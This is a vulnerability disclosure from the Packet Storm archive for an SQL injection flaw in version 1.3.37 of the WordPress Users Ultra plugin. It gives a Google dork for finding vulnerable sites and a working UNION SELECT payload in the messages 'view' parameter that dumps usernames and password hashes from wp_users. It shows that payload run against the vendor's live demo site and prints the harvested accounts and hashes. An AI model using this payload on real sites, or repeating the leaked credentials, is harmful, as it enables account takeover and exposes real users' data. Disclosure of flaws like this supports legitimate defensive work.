WordPress Users Ultra 1.3.37 SQL Injection

2014-09-29T00:00:00
ID PACKETSTORM:128473
Type packetstorm
Reporter XroGuE
Modified 2014-09-29T00:00:00

Description

                                        
                                            `#################################################################################################  
# Title : Wordpress Users Ultra Plugin - SQL injection Vulnerability  
# Risk : High+/Critical  
# Author : XroGuE  
# Google Dork : inurl: wp-content/plugins/users-ultra/  
# Plugin Version : 1.3.37  
# Plugin Name : users ultra  
# Plugin Download Link : https://downloads.wordpress.org/plugin/users-ultra.zip  
# Vendor Home : http://www.usersultra.com/  
# Date : 2014/09/27  
# Tested in : Win7 - Linux  
##################################################################################################  
# Description:   
# This Vulnerability Available in Both Version of This Plugin (Free & Pro Version).  
# You need To Login As member and Send Or Recive a Message To Get A Message ID To Inject it.  
# The Vendor Demo Has This Vulnerability,Check it at This Link: http://usersultra.com/uultra-testing/  
#  
# PoC :  
#  
# http://localhost/wp/?page_id=117&module=messages&view=[id]  
#  
# Proof :  
#  
# http://www.aparat.com/v/vNI81  
# http://www.myblog.att4ck3r.ir/wordpress-users-ultra-plugin-sql-injection-vulnerability/  
#  
##################################################################################################  
#  
# Demo :  
#  
# http://localhost/wp/?page_id=117&module=messages&view=1+and+1=0 union all select 1,2,3,group_concat(user_login,0x3a,user_pass),5,6,7,8,9,10 from+wp_users--  
# => Users: admin:$P$BsrGHnd./mOlHkK15iHCn81gjJQekC.,test:$P$Bmfp8cwwTYKxKlPQZSJtjVfa4Vw11o1  
#  
#  
# http://usersultra.com/uultra-testing/myaccount/?module=messages&view=63 and 1=0 union all select 1,2,3,group_concat(user_login,0x3a,user_pass),5,6,7,8,9,10 from+wp_users--  
# => Users: admin:$P$BN.dvG/wrbH1RPFn2DHAkqr6G6NrKs1,franco_zuna:$P$Bakm4N8i/uS/VDjVfQ6oeSYRJWGZ4n.,test:$P$BRraCwdfKm2WGnnukOORsHDhfWmXVv/,adan_brock:$P$BmbyJbV5L8wf.xaRWxHyjAGMz/2UxL.,sean_daze:$P$B0mbw9c/W96/4SlTAkkLGePMqqgZKX1,allnetprovider-z:$P$BuEBNJXebTD3j5gmNqSNsZd8dwQUJb.,Ali28:$P$BeMVJLGapu6EF7FdBtPtKdxGZTKBgl1,Rolan-Deri:$P$Bf/Yt2IEEPxlURhBjPkA3UXyCLIuAX/,louis_h_central_geek:$P$BsYPVcay/T4t4HRSaG0j89mmJPMGjw1  
#  
##################################################################################################  
#  
# Discovered By : XroGuE  
# Website : http://www.Att4ck3r.ir  
# E-Mail : info[at]att4ck3r[Dot]ir  
#  
##################################################################################################  
`